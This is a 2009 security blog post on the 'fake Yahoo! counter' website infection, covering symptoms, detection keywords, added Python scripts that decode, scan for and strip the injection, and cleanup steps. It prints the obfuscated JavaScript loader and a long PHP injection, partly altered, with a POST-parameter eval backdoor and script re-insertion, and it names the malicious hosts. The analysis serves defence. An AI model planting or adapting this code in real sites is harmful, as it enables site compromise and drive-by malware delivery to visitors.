
Fake Yahoo Counter Script Unmasked

   12 Mar 09   Filed in Website exploits

Fake Yahoo! counter script injection has been the most “popular” security problem for the last couple of weeks in the “Malware & hacked sites” section of Google’s webmaster help forum.

This script is not a new exploit, but it looks like there is a new surge that affects thousands of sites, so I decided to review it.

Symptoms

  1. Some antivirus tools may display virus alerts when people view your site.
  2. Google blacklists your site and displays the “this site may harm your computer” warning next to links to your site in search results.
  3. Users of Firefox 3, Google Chrome and Safari cannot open your site. Instead of your web pages they see a big warning that your site is an attack site.
  4. As a result, traffic decreases.
  5. Google’s Safe Browsing diagnostics page for your site contains the following text:
    Malicious software is hosted on 6 domain(s), including 78 . 110 . 175 . 0/

Yahoo counter script

This IP address (78. 110. 175. 0) is a sign of the fake Yahoo! counter exploit, which injects a malicious script into legitimate web pages disguised as a Yahoo counter (hence the name).

The script looks like this (I removed some parts of the code):

<!-- Yahoo! Counter starts
if(typeof(yahoo_ counter)!=typeof(1))ev al(unescape('#/~/#%3Cdi~ v&%20!s&%74!y!%6C&e%3D~%...%3E').replace(/&|#|`|!|~|||@|$/g,""));var yahoo_counter=1;
<!-- counter end -->

When this script is executed, it inserts another script that loads code from 195 .24 .76 .251 and 78 .110 .175 .21. The latter is the address mentioned on Google’s Safe Browsing page (Google always replaces the last byte of IP addresses with 0, which is why you won’t see the real address of the malicious site, the one ending in 21). The 195 .24 .76 .251 server is not responding and is therefore not mentioned on Google’s diagnostics page.
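The obfuscation in the snippet above is simple: a percent-encoded string with filler characters sprinkled into it, a replace() that strips the filler, unescape() to decode, and eval() to run the result. For triage you want to see the decoded payload without ever running it. The following Python helper is an added example and is not code from the original post; it assumes the filler regex is an alternation of single characters (as in the sample) and uses a constructed, harmless payload that decodes to a hidden div.

```python
import re
from urllib.parse import unquote

# Shape of the injected call, as in the snippet above:
#   eval(unescape('<payload>').replace(/<filler alternation>/g,""))
UNESCAPE_REPLACE = re.compile(
    r"""unescape\(\s*'(?P<payload>[^']*)'\s*\)\s*\.replace\(\s*/(?P<junk>[^/]*)/g\s*,\s*(?:''|"")\s*\)"""
)


def junk_chars(junk_regex):
    """Literal characters removed by the filler regex.

    Assumption: the regex is a '|'-separated alternation of single characters,
    possibly backslash-escaped (\\$ or \\|).  Empty alternatives match nothing
    worth stripping, and an unescaped '$' is an anchor, not a dollar sign.
    """
    chars = set()
    for token in re.findall(r"\\.|[^|]", junk_regex):
        if token.startswith("\\"):
            chars.add(token[1:])        # escaped literal
        elif token not in "$^":
            chars.add(token)
    return chars


def decode_payloads(script):
    """Decode every eval(unescape(...).replace(...)) payload found in `script`.

    Nothing is executed: the filler is stripped and the remainder is
    percent-decoded.  unescape() and unquote() agree on %XX sequences;
    JavaScript-only %uXXXX sequences are left untouched.
    """
    decoded = []
    for m in UNESCAPE_REPLACE.finditer(script):
        junk = junk_chars(m.group("junk"))
        stripped = "".join(c for c in m.group("payload") if c not in junk)
        decoded.append(unquote(stripped))
    return decoded


# Constructed sample in the same shape as the injected script; the payload
# decodes to a harmless hidden div rather than a remote script loader.
SAMPLE = (
    "<!-- Yahoo! Counter starts\n"
    "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('"
    "#/~/#%3Cdi~v&%20!s&%74!y!%6C&e%3D~%22d`isp@l!ay%3An~one%22%3E%3C/d!iv%3E"
    "').replace(/&|#|`|!|~|||@|$/g,\"\"));var yahoo_counter=1;\n"
    "<!-- counter end -->\n"
)

if __name__ == "__main__":
    for payload in decode_payloads(SAMPLE):
        print(payload)
```

On a real sample the decoded text is what you hand to your hosting provider or an analyst; the remote hosts it references are the ones to block and to search the rest of the server for.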

PHP exploit

There is also a PHP incarnation of this exploit. The following code can be injected into PHP files (I’ve slightly modified the encrypted parts so that it can’t be abused):

<?php
if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0Pjwh...lNjNvbyU2QmBpZXwlMkVAJTZEJCU2MSU3NCU2MyU2OCUyOCQlMkZAJTVDYiMlNjh+Z2BmYHRAJTNEJiUzMSUyRiUyOSM9PSU2RUAlNzUlNkNgbCQlMjl+JTY2fCU2RmByJTI4fmkkJTNEJTMwJTNCfCU2OSQlM0MkJTMyJTNCJCU2OSUyQiUyQiUyOSU2NCZvY3wlNzUmJTZEYGVgJTZFIyU3NH4lMkVgd3xyJTY5ISU3NCU2NSMoYCUyMmAlM0MjJTczJTYzJnJpJTcwJCU3N...jMhdSU2RCElNjUlNkUmJTc0YC4mJTc3ciU2OX4lNzRAZSUyOCElNUMlMjJ+JTNDJCU3M0AlNjMlNzImJTY5JTcwdCYlMjAjJTY5fCU2NHw9JTVGfCUyMiUyQiU2OSUyQiYlMjJfJTIwcyU3MmMmPSElMkYlMkYlMjIrIyU2MX4lNUIlNjl8XStAIiUyRmNAcCQlMkZgJTNFfCUzQyU1QyU1QyYvJCU3MyQlNjMjcmklNzAhJTc0JCUzRSElNUMlMjJ8JTI5QCUzQyU1QyMlMkZzYyYlNzIlNjlwJTc0JTNFfCUyMiUyOSUzQlxuIy8jJTJGJTNDJi8hJTY0IyU2OSMlNzYlM0UnKS5yZXBsYWNlKC9cfHxAfCN8YHxcJHxcIXx+fFw...t2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function
tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<s cript(.*?)</sc ript>#is',$s,$a))foreach($a[0]
as
$v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD...haG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=='),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(s*</body)#mi',str_replace('$','\$',TMP_XHGFJOKL).'1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}function
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2();
?>

I’m not a PHP expert, but I can see that

  • there is a base64-encoded Yahoo counter script that is injected into the HTML code.
  • this code looks for files in the server’s temporary directory and tries to include them. The names of the files are /tmp/m1 through /tmp/m99. I don’t know what kind of code those files may contain. Maybe some instructions to infect other sites on the same server.

If you can dissect this PHP code, please let me know what exactly it does.

Detection

To detect this exploit, scan all files on the server (not on your computer) for the above script. You can use yahoo_counter as a keyword for the search. If you are searching for the PHP exploit code, use tmp_lkojfghx as a keyword.
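A keyword search is the right first step, and it is easy to extend with a few patterns taken from the injected code shown above. The scanner below is an added example, not a tool from the original post: it walks a document root, flags the two keywords recommended here plus three heuristics I derived from the PHP and JavaScript samples (the /tmp/m include loop, eval of a POST parameter, and the eval(unescape(...).replace()) construct), and reports file and line for each hit. The infected and clean pages it scans are constructed fixtures.

```python
import os
import re
import tempfile

# The first two patterns are the keywords recommended above; the remaining
# three are heuristics derived from the injected code (my assumption, not
# from the post), so treat hits on them as leads to inspect, not proof.
INDICATORS = {
    "yahoo_counter marker":          re.compile(r"yahoo_counter", re.I),
    "tmp_lkojfghx function name":    re.compile(r"tmp_lkojfghx"),
    "include of /tmp/m<N> files":    re.compile(r"""['"]/tmp/m['"]\s*\.\s*\$\w+"""),
    "eval of a POST parameter":      re.compile(r"eval\(\s*\$_POST\["),
    "eval(unescape(...).replace())": re.compile(r"eval\(\s*unescape\(.*?\)\s*\.replace\("),
}


def scan_text(text):
    """Return (line number, indicator label) pairs for every hit in `text`."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, rx in INDICATORS.items():
            if rx.search(line):
                hits.append((lineno, label))
    return hits


def scan_tree(root, extensions=(".php", ".html", ".htm", ".js", ".inc")):
    """Walk a document root; map each suspicious file (relative path) to its hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


# Constructed fixtures: a page carrying cut-down copies of both injections,
# and a clean page using the legitimate Yahoo! Web Analytics snippet.
INFECTED_PHP = """<?php
if(!function_exists('tmp_lkojfghx')){for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}
if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);}
?>
<html><body>Hello
<script><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%3C').replace(/&|#/g,""));var yahoo_counter=1;
<!-- counter end --></script>
</body></html>
"""

CLEAN_HTML = """<html><body>
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript">YWATracker = YWA.getTracker("1000111111111");YWATracker.submit();</script>
</body></html>
"""


def demo():
    """Write the fixtures into a temporary document root and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as fh:
            fh.write(INFECTED_PHP)
        with open(os.path.join(root, "about.html"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_HTML)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        for lineno, label in hits:
            print(f"{path}:{lineno}: {label}")
```

Point scan_tree() at the real document root on the server (over SSH, or on a download of the whole site), not at a local copy that may predate the infection. A file that hits only the yahoo_counter marker has the HTML injection; a file that hits tmp_lkojfghx or the /tmp/m pattern carries the PHP code that keeps re-inserting it.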

This exploit is now detectable by Unmask Parasites, so you can check your web pages online. If this script is detected, you will see the warning “suspicious inline script found” and a snippet of the suspicious code in the “Suspicious Inline Scripts” section.

[Screenshot: Yahoo counter script detected by Unmask Parasites]

If you suspect that your site is hacked, don’t open it in a web browser with JavaScript enabled. However, if you have the NoScript Firefox plugin, you can detect the fake Yahoo counter exploit in your web browser. Allow scripts from your own site only (don’t choose “allow everything”). If you visit a page with the malicious script, you’ll see a warning that scripts from 195 .24 .76 .251 and 78 .110 .175 .21 have been blocked.

Don’t judge a book by its cover

It’s a common practice for hackers to hide malicious scripts by making them look like something trusted. This time they added the comment “Yahoo! Counter starts” and a variable named yahoo_counter. Don’t be fooled by such tricks: well-known, trusted words cannot make a malicious script benign, just as the label “Milk” won’t make poison a healthy beverage.

Don’t trust anything you don’t remember adding to your site. Double-check everything. Ask your webmaster and other people responsible for your site. In any case, no matter how big and trusted Yahoo is, it can’t insert anything into your site (and never does).

By the way, reputable sites never serve obfuscated scripts to their clients. In the fake Yahoo counter script, everything except the words yahoo and counter is simply unreadable. Legitimate scripts from Yahoo never look like this. Just compare it with the real Yahoo! script used for the Yahoo! Web Analytics tracking code:

<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js" ></script>
<script type="text/javascript">
YWATracker = YWA.getTracker("1000111111111");
YWATracker.setDocumentName("ITEMID");
YWATracker.setDocumentGroup("ProductView");
YWATracker.setDomains("*.store.yahoo.net");
YWATracker.setSKU("ITEMID");
YWATracker.setAction("PRODUCT_VIEW");
YWATracker.submit();
</script>

As you can see, this code is clean and doesn’t look like an unintelligible string of random characters.

And by the way, as far as I know, there is no such thing as a genuine Yahoo! counter.

How to clean up?

This is not a definitive guide (I don’t have reliable information about how this exploit works), but the following steps may help you remove the malicious code and make your site more resilient to future attacks.

  1. Contact your hosting provider. If you are on a shared hosting plan, it could be that some other compromised account infects its neighbors. Let them investigate the issue and pay special attention to files in the /tmp directory.
  2. Make sure your local computer is not infected (malware can steal passwords and modify local copies of web pages).
  3. Change all site passwords (FTP, control panel, etc.).
  4. Write-protect files and directories on the server.
  5. Remove malicious code from your server files. The easiest way is to remove everything and upload a clean version. You have a backup, don’t you?
  6. When you believe your site is clean, request a review via Google’s Webmaster Tools.
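If re-uploading everything is not an option, step 5 can be done file by file for the HTML injection: the injected block always sits between the “Yahoo! Counter starts” and “counter end” comment markers shown earlier. The helper below is an added example, not code from the original post; it strips that block from a page, keeps a backup of any file it changes, and runs on a constructed sample page. Read together with the PHP code shown above (which hooks PHP’s output buffering and re-inserts the script before </body> as pages are served), this only cleans static HTML; the PHP files still have to be replaced.

```python
import re
import shutil

# The injected block: an optional <script ...> wrapper, the opening marker,
# anything up to the closing marker, an optional </script>, and trailing
# whitespace so no blank line is left behind.
INJECTED_BLOCK = re.compile(
    r"(?:<script[^>]*>\s*)?<!--\s*Yahoo!\s*Counter\s*starts.*?"
    r"<!--\s*counter\s*end\s*-->(?:\s*</script>)?\s*",
    re.I | re.S,
)


def strip_injected_block(html):
    """Return (cleaned html, number of injected blocks removed)."""
    return INJECTED_BLOCK.subn("", html)


def clean_file(path):
    """Strip the block from one file in place, keeping `<path>.bak` if it changed.

    Returns the number of blocks removed (0 means the file was left untouched).
    """
    with open(path, encoding="utf-8", errors="replace") as fh:
        original = fh.read()
    cleaned, count = strip_injected_block(original)
    if count:
        shutil.copyfile(path, path + ".bak")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(cleaned)
    return count


# Constructed sample page carrying a cut-down copy of the injected block.
SAMPLE_PAGE = """<html><body>
<p>Welcome</p>
<script language=javascript><!-- Yahoo! Counter starts
if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%3C').replace(/&|#/g,""));var yahoo_counter=1;
<!-- counter end --></script>
</body></html>
"""

if __name__ == "__main__":
    cleaned, count = strip_injected_block(SAMPLE_PAGE)
    print(f"removed {count} block(s)")
    print(cleaned)
```

After cleaning, rescan the server: if the block reappears in pages you have just fixed, the PHP variant is still active and step 1 (the hosting provider and the /tmp files) is where to look next.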

If anyone has additional information about this fake Yahoo counter exploit, please leave your comments here.

Reader’s Comments

  1.

    I have the same problem on my website. I have removed the malicious code from all infected files.

    The problem is, I still do not know where the script came from or what caused it to be infected.

    Did my server get infected by a worm? What is it called, and how does one go about removing it?